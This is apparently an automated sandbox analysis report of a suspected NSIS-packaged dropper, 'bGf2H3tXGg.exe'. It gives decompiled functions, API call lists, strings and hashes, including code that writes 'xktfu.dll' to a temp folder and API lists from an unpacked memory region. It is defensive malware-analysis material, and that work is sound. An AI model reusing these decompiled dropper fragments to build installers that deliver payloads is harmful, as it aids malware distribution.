                  • Part of subcall function 00405C90: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6
                • GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\bGf2H3tXGg.exe,C:\Users\user\Desktop\bGf2H3tXGg.exe,80000000,00000003), ref: 00402F1A
                • GlobalAlloc.KERNEL32(00000040,00000020), ref: 00403050
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                • String ID: "C:\Users\user\Desktop\bGf2H3tXGg.exe" $@TA$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\bGf2H3tXGg.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                • API String ID: 2803837635-3455945839
                • Opcode ID: d2642f5c1e57ff917447350ecc80b65a471f1c26fbd3ec2d1bf2d56bf534e989
                • Instruction ID: b77d5a27d8a3a8735664692b17331c00252a13d20c8f5ee7c59d5cd6c332e3a5
                • Opcode Fuzzy Hash: d2642f5c1e57ff917447350ecc80b65a471f1c26fbd3ec2d1bf2d56bf534e989
                • Instruction Fuzzy Hash: B851E471A00204ABDF20AF64DD85FAF7AB8AB14359F60413BF500B22D1C7B89E858B5D
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401759, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 147stringtimeCOMMON
                Download Yara Rule
                C-Code - Quality: 61%
                			E00401759(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				CHAR* _t83;
				void* _t85;

				_t75 = __ebx;
				_t82 = E00402BCE(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
				_t33 = E00405AFC(_t82);
				_push(_t82);
				_t83 = "Cgrlcpdlsle";
				if(_t33 == 0) {
					lstrcatA(E00405A8F(E004060F7(_t83, "C:\\Users\\alfons\\AppData\\Local\\Temp")), ??);
				} else {
					E004060F7();
				}
				E004063D2(_t83);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E0040646B(_t83);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E00405C6B(_t83);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E00405C90(_t83, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0xc) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E0040521E(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x42f4c8;
						goto L32;
					} else {
						E004060F7(0x40ac38, 0x430000);
						E004060F7(0x430000, _t83);
						E0040618A(_t75, 0x40ac38, _t83, "C:\Users\alfons\AppData\Local\Temp\nsh9AB8.tmp\xktfu.dll",  *((intOrPtr*)(_t85 - 0x14)));
						E004060F7(0x430000, 0x40ac38);
						_t62 = E00405813("C:\Users\alfons\AppData\Local\Temp\nsh9AB8.tmp\xktfu.dll",  *(_t85 - 0x28) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x42f4c8 =  &( *0x42f4c8->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(_t83);
								_push(0xfffffffa);
								E0040521E();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E0040521E(0xffffffea,  *(_t85 - 8));
				 *0x42f4f4 =  *0x42f4f4 + 1;
				_push(_t75);
				_push(_t75);
				_push( *(_t85 - 0xc));
				_push( *((intOrPtr*)(_t85 - 0x20)));
				_t43 = E004030D8(); // executed
				 *0x42f4f4 =  *0x42f4f4 - 1;
				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0xc), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 0xc)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E0040618A(_t75, _t80, _t83, _t83, 0xffffffee);
					} else {
						E0040618A(_t75, _t80, _t83, _t83, 0xffffffe9);
						lstrcatA(_t83,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(_t83);
					E00405813();
					goto L29;
				}
				goto L33;
			}

















                0x00401759
                0x00401760
                0x00401769
                0x0040176c
                0x0040176f
                0x00401774
                0x00401775
                0x0040177c
                0x00401798
                0x0040177e
                0x0040177f
                0x0040177f
                0x0040179e
                0x004017a8
                0x004017a8
                0x004017ac
                0x004017af
                0x004017b4
                0x004017b6
                0x004017b8
                0x004017bd
                0x004017bd
                0x004017c8
                0x004017c8
                0x004017d9
                0x004017db
                0x004017db
                0x004017dc
                0x004017dc
                0x004017df
                0x004017e2
                0x004017e5
                0x004017e5
                0x004017ec
                0x004017fb
                0x00401800
                0x00401803
                0x00401806
                0x00000000
                0x00000000
                0x00401808
                0x0040180b
                0x00401865
                0x0040186a
                0x004015b0
                0x004027bf
                0x004027bf
                0x00402a5a
                0x00402a5d
                0x00402a5d
                0x00000000
                0x0040180d
                0x00401813
                0x0040181e
                0x0040182b
                0x00401836
                0x0040184c
                0x0040184c
                0x0040184f
                0x00000000
                0x00401855
                0x00401855
                0x00401856
                0x00401873
                0x00402a63
                0x00402a63
                0x00402a63
                0x00401858
                0x00401858
                0x00401859
                0x00401492
                0x00402387
                0x00402387
                0x00402387
                0x00401856
                0x0040184f
                0x00402a65
                0x00402a69
                0x00402a69
                0x00401883
                0x00401888
                0x0040188e
                0x0040188f
                0x00401890
                0x00401893
                0x00401896
                0x0040189b
                0x004018a1
                0x004018a5
                0x004018a7
                0x004018af
                0x004018bb
                0x004018a9
                0x004018a9
                0x004018ad
                0x00000000
                0x00000000
                0x004018ad
                0x004018c4
                0x004018ca
                0x004018cc
                0x00000000
                0x004018d2
                0x004018d2
                0x004018d5
                0x004018ed
                0x004018d7
                0x004018da
                0x004018e3
                0x004018e3
                0x004018f2
                0x004018f7
                0x00402382
                0x00000000
                0x00402382
                0x00000000

                APIs
                • lstrcatA.KERNEL32(00000000,00000000,Cgrlcpdlsle,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401798
                • CompareFileTime.KERNEL32(-00000014,?,Cgrlcpdlsle,Cgrlcpdlsle,00000000,00000000,Cgrlcpdlsle,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017C2
                  • Part of subcall function 004060F7: lstrcpynA.KERNEL32(?,?,00000400,0040341A,Template Method Pattern Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00406104
                  • Part of subcall function 0040521E: lstrlenA.KERNEL32(0042A070,00000000,00422848,7519EA30,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                  • Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,0042A070,00000000,00422848,7519EA30,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                  • Part of subcall function 0040521E: lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00422848,7519EA30), ref: 0040527A
                  • Part of subcall function 0040521E: SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                  • Part of subcall function 0040521E: SendMessageA.USER32 ref: 004052B2
                  • Part of subcall function 0040521E: SendMessageA.USER32 ref: 004052CC
                  • Part of subcall function 0040521E: SendMessageA.USER32 ref: 004052DA
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsh9AB8.tmp\xktfu.dll$Cgrlcpdlsle
                • API String ID: 1941528284-3668077838
                • Opcode ID: f339b6a59adf296648f3f8b3866004a1f68460c5fd538596058490c9e85b0c89
                • Instruction ID: bb6028c3778eb4cec0c6c1d7eb8bf073a5325157b60575559d09146ef789c5eb
                • Opcode Fuzzy Hash: f339b6a59adf296648f3f8b3866004a1f68460c5fd538596058490c9e85b0c89
                • Instruction Fuzzy Hash: D4419A32900515BACB107BB5CC45DAF3678EF05329F20833FF426B51E1DA7C8A529A6D
                Uniqueness

                Uniqueness Score: -1.00%

                Function 02280705, Relevance: 10.7, APIs: 7, Instructions: 237fileCOMMON
                Download Yara Rule
                APIs
                • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 02280807
                • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 022809D4
                Memory Dump Source
                • Source File: 00000000.00000002.251449636.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                Similarity
                • API ID: CreateFileFreeVirtual
                • String ID:
                • API String ID: 204039940-0
                • Opcode ID: a31ddf8ab6fa1553e31ef8f8ebf533154cdda46e8ec2b8a06eaa7384c21ee20d
                • Instruction ID: 5dc702b8885b361dcaa72ee4afb96c8a780c726e9f22398c198606e1197aa8b7
                • Opcode Fuzzy Hash: a31ddf8ab6fa1553e31ef8f8ebf533154cdda46e8ec2b8a06eaa7384c21ee20d
                • Instruction Fuzzy Hash: ACA1F230D22249EFEF20EFE4C845BADBBB1AF08715F20855AE514BA2A4D3749A54DF50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004030D8, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 166COMMON
                Download Yara Rule
                C-Code - Quality: 95%
                			E004030D8(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
				signed int _v8;
				int _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				char _v88;
				void* _t65;
				void* _t69;
				long _t70;
				intOrPtr _t75;
				long _t76;
				intOrPtr _t77;
				void* _t78;
				int _t88;
				intOrPtr _t92;
				intOrPtr _t95;
				long _t96;
				signed int _t97;
				int _t98;
				int _t99;
				intOrPtr _t100;
				void* _t101;
				void* _t102;

				_t97 = _a16;
				_t92 = _a12;
				_v12 = _t97;
				if(_t92 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_v16 = _t92;
				if(_t92 == 0) {
					_v16 = 0x421448;
				}
				_t62 = _a4;
				if(_a4 >= 0) {
					E00403300( *0x42f498 + _t62);
				}
				if(E004032EA( &_a16, 4) == 0) {
					L41:
					_push(0xfffffffd);
					goto L42;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t92 != 0) {
							if(_a16 < _t97) {
								_t97 = _a16;
							}
							if(E004032EA(_t92, _t97) != 0) {
								_v8 = _t97;
								L44:
								return _v8;
							} else {
								goto L41;
							}
						}
						if(_a16 <= _t92) {
							goto L44;
						}
						_t88 = _v12;
						while(1) {
							_t98 = _a16;
							if(_a16 >= _t88) {
								_t98 = _t88;
							}
							if(E004032EA(0x41d448, _t98) == 0) {
								goto L41;
							}
							_t69 = E00405D37(_a8, 0x41d448, _t98); // executed
							if(_t69 == 0) {
								L28:
								_push(0xfffffffe);
								L42:
								_pop(_t65);
								return _t65;
							}
							_v8 = _v8 + _t98;
							_a16 = _a16 - _t98;
							if(_a16 > 0) {
								continue;
							}
							goto L44;
						}
						goto L41;
					}
					_t70 = GetTickCount();
					 *0x40bdac =  *0x40bdac & 0x00000000;
					 *0x40bda8 =  *0x40bda8 & 0x00000000;
					_t14 =  &_a16;
					 *_t14 = _a16 & 0x7fffffff;
					_v20 = _t70;
					 *0x40b890 = 8;
					 *0x415438 = 0x40d430;
					 *0x415434 = 0x40d430;
					 *0x415430 = 0x415430;
					_a4 = _a16;
					if( *_t14 <= 0) {
						goto L44;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t99 = 0x4000;
						if(_a16 < 0x4000) {
							_t99 = _a16;
						}
						if(E004032EA(0x41d448, _t99) == 0) {
							goto L41;
						}
						_a16 = _a16 - _t99;
						 *0x40b880 = 0x41d448;
						 *0x40b884 = _t99;
						while(1) {
							_t95 = _v16;
							 *0x40b888 = _t95;
							 *0x40b88c = _v12;
							_t75 = E00406625(0x40b880);
							_v24 = _t75;
							if(_t75 < 0) {
								break;
							}
							_t100 =  *0x40b888; // 0x422848
							_t101 = _t100 - _t95;
							_t76 = GetTickCount();
							_t96 = _t76;
							if(( *0x42f4f4 & 0x00000001) != 0 && (_t76 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfA( &_v88, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t102 = _t102 + 0xc;
								E0040521E(0,  &_v88);
								_v20 = _t96;
							}
							if(_t101 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L44;
							} else {
								if(_a12 != 0) {
									_t77 =  *0x40b888; // 0x422848
									_v8 = _v8 + _t101;
									_v12 = _v12 - _t101;
									_v16 = _t77;
									L23:
									if(_v24 != 1) {
										continue;
									}
									goto L44;
								}
								_t78 = E00405D37(_a8, _v16, _t101); // executed
								if(_t78 == 0) {
									goto L28;
								}
								_v8 = _v8 + _t101;
								goto L23;
							}
						}
						_push(0xfffffffc);
						goto L42;
					}
					goto L41;
				}
			}


























                0x004030e0
                0x004030e4
                0x004030e7
                0x004030ec
                0x004030ee
                0x004030ee
                0x004030f5
                0x004030f9
                0x004030fe
                0x00403100
                0x00403100
                0x00403107
                0x0040310c
                0x00403117
                0x00403117
                0x00403129
                0x004032d8
                0x004032d8
                0x00000000
                0x0040312f
                0x00403133
                0x00403285
                0x004032c8
                0x004032ca
                0x004032ca
                0x004032d6
                0x004032dd
                0x004032e0
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004032d6
                0x0040328a
                0x00000000
                0x00000000
                0x0040328c
                0x0040328f
                0x00403292
                0x00403295
                0x00403297
                0x00403297
                0x004032a7
                0x00000000
                0x00000000
                0x004032ae
                0x004032b5
                0x0040327f
                0x0040327f
                0x004032da
                0x004032da
                0x00000000
                0x004032da
                0x004032b7
                0x004032ba
                0x004032c1
                0x00000000
                0x00000000
                0x00000000
                0x004032c3
                0x00000000
                0x0040328f
                0x0040313f
                0x00403141
                0x00403148
                0x0040314f
                0x0040314f
                0x00403156
                0x0040315e
                0x00403168
                0x0040316d
                0x00403175
                0x0040317f
                0x00403182
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00403188
                0x00403188
                0x00403188
                0x00403190
                0x00403192
                0x00403192
                0x004031a3
                0x00000000
                0x00000000
                0x004031a9
                0x004031ac
                0x004031b2
                0x004031b8
                0x004031b8
                0x004031c3
                0x004031c9
                0x004031ce
                0x004031d5
                0x004031d8
                0x00000000
                0x00000000
                0x004031de
                0x004031e4
                0x004031e6
                0x004031ef
                0x004031f1
                0x0040321f
                0x00403225
                0x0040322e
                0x00403233
                0x00403233
                0x00403238
                0x00403273
                0x00000000
                0x00000000
                0x00000000
                0x0040323a
                0x0040323e
                0x00403255
                0x0040325a
                0x0040325d
                0x00403260
                0x00403263
                0x00403267
                0x00000000
                0x00000000
                0x00000000
                0x0040326d
                0x00403247
                0x0040324e
                0x00000000
                0x00000000
                0x00403250
                0x00000000
                0x00403250
                0x00403238
                0x0040327b
                0x00000000
                0x0040327b
                0x00000000
                0x00403188

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CountTick$wsprintf
                • String ID: ... %d%%$H(B
                • API String ID: 551687249-2300805546
                • Opcode ID: 6105a75ac29723741842d4acb1fda97f5bbbd1560d169b08801a999ce2df6a86
                • Instruction ID: fb515496a62f3aa3a261881475cff076317c99cf113f2c02ef85df511ffa7adb
                • Opcode Fuzzy Hash: 6105a75ac29723741842d4acb1fda97f5bbbd1560d169b08801a999ce2df6a86
                • Instruction Fuzzy Hash: 68515C71900219ABCB10DF95DA44A9E7BA8EF54356F1481BFE800B72D0C7789A41CBAD
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004056E4, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E004056E4(CHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x408384;
				_v36.Group = 0x408384;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x408374;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                0x004056ef
                0x004056f3
                0x004056f6
                0x004056fc
                0x00405700
                0x00405704
                0x0040570c
                0x00405713
                0x00405719
                0x00405720
                0x00405727
                0x0040572f
                0x00405731
                0x00000000
                0x00405731
                0x0040573b
                0x00405742
                0x00405758
                0x00000000
                0x00000000
                0x00000000
                0x0040575a
                0x0040575e

                APIs
                • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405727
                • GetLastError.KERNEL32 ref: 0040573B
                • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405750
                • GetLastError.KERNEL32 ref: 0040575A
                Strings
                • C:\Users\user\Desktop, xrefs: 004056E4
                • C:\Users\user\AppData\Local\Temp\, xrefs: 0040570A
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ErrorLast$CreateDirectoryFileSecurity
                • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                • API String ID: 3449924974-1521822154
                • Opcode ID: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                • Instruction ID: 199f41d5e308de8b96f609cf750b761cce64c3ab1ca85d652f9564a15c89f022
                • Opcode Fuzzy Hash: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                • Instruction Fuzzy Hash: FF010471C00219EADF019BA0C944BEFBBB8EB04354F00403AD944B6290E7B89A48DBA9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00406492, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00406492(intOrPtr _a4) {
				char _v292;
				int _t10;
				struct HINSTANCE__* _t14;
				void* _t16;
				void* _t21;

				_t10 = GetSystemDirectoryA( &_v292, 0x104);
				if(_t10 > 0x104) {
					_t10 = 0;
				}
				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
					_t16 = 1;
				} else {
					_t16 = 0;
				}
				_t5 = _t16 + 0x40a014; // 0x5c
				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
				return _t14;
			}








                0x004064a9
                0x004064b2
                0x004064b4
                0x004064b4
                0x004064b8
                0x004064ca
                0x004064c4
                0x004064c4
                0x004064c4
                0x004064ce
                0x004064e2
                0x004064f6
                0x004064fd

                APIs
                • GetSystemDirectoryA.KERNEL32 ref: 004064A9
                • wsprintfA.USER32 ref: 004064E2
                • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064F6
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: DirectoryLibraryLoadSystemwsprintf
                • String ID: %s%s.dll$UXTHEME$\
                • API String ID: 2200240437-4240819195
                • Opcode ID: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                • Instruction ID: 03f82d29dddd483449b3488b7c2e1daaa1831c8d2f1a72e13e07ee25955ceb49
                • Opcode Fuzzy Hash: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                • Instruction Fuzzy Hash: DDF0213051020A6BDB55D764DD0DFFB375CEB08304F14017AA58AF11C1DA78D5398B6D
                Uniqueness

                Uniqueness Score: -1.00%

                Function 02281205, Relevance: 9.9, APIs: 4, Strings: 1, Instructions: 1172fileCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 0228101F: Sleep.KERNELBASE(?,?,034CF0BF), ref: 02281044
                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 02282050
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.251449636.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                Similarity
                • API ID: CreateFileSleep
                • String ID: 40fbb79f6fda487d8f06db1c793101bd
                • API String ID: 2694422964-1192784401
                • Opcode ID: bbe41873a6fbe4824ddb1bc01cae172123ace91d6be65c8ab8d238b5546e4da5
                • Instruction ID: 666fef6484770b5a02f504520e5a2d10ed57650a39c0397e84b919599295fb4f
                • Opcode Fuzzy Hash: bbe41873a6fbe4824ddb1bc01cae172123ace91d6be65c8ab8d238b5546e4da5
                • Instruction Fuzzy Hash: 6EA2B515A94398A8EB70C7A4BC16BFD63B1AF44B10F2055C7E60CEE1E1D3B51ED49B0A
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00405CBF, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00405CBF(char _a4, intOrPtr _a6, CHAR* _a8) {
				char _t11;
				signed int _t12;
				int _t15;
				signed int _t17;
				void* _t20;
				CHAR* _t21;

				_t21 = _a4;
				_t20 = 0x64;
				while(1) {
					_t11 =  *0x40a3d4; // 0x61736e
					_t20 = _t20 - 1;
					_a4 = _t11;
					_t12 = GetTickCount();
					_t17 = 0x1a;
					_a6 = _a6 + _t12 % _t17;
					_t15 = GetTempFileNameA(_a8,  &_a4, 0, _t21); // executed
					if(_t15 != 0) {
						break;
					}
					if(_t20 != 0) {
						continue;
					}
					 *_t21 =  *_t21 & 0x00000000;
					return _t15;
				}
				return _t21;
			}









                0x00405cc3
                0x00405cc9
                0x00405cca
                0x00405cca
                0x00405ccf
                0x00405cd0
                0x00405cd3
                0x00405cdd
                0x00405cea
                0x00405ced
                0x00405cf5
                0x00000000
                0x00000000
                0x00405cf9
                0x00000000
                0x00000000
                0x00405cfb
                0x00000000
                0x00405cfb
                0x00000000

                APIs
                • GetTickCount.KERNEL32 ref: 00405CD3
                • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000007,00000009,0000000B), ref: 00405CED
                Strings
                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405CC2
                • nsa, xrefs: 00405CCA
                • "C:\Users\user\Desktop\bGf2H3tXGg.exe" , xrefs: 00405CBF
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CountFileNameTempTick
                • String ID: "C:\Users\user\Desktop\bGf2H3tXGg.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                • API String ID: 1716503409-3827994080
                • Opcode ID: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                • Instruction ID: e7aa094648ebfea3bacdca9f43850832113df4cf88f6c4d01cd72ac7e01032f8
                • Opcode Fuzzy Hash: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                • Instruction Fuzzy Hash: 0AF08236308308ABEB108F56ED04B9B7BACDF91750F10C03BFA44EB290D6B499548758
                Uniqueness

                Uniqueness Score: -1.00%

                Function 02280034, Relevance: 6.6, APIs: 4, Instructions: 552processthreadCOMMON
                Download Yara Rule
                APIs
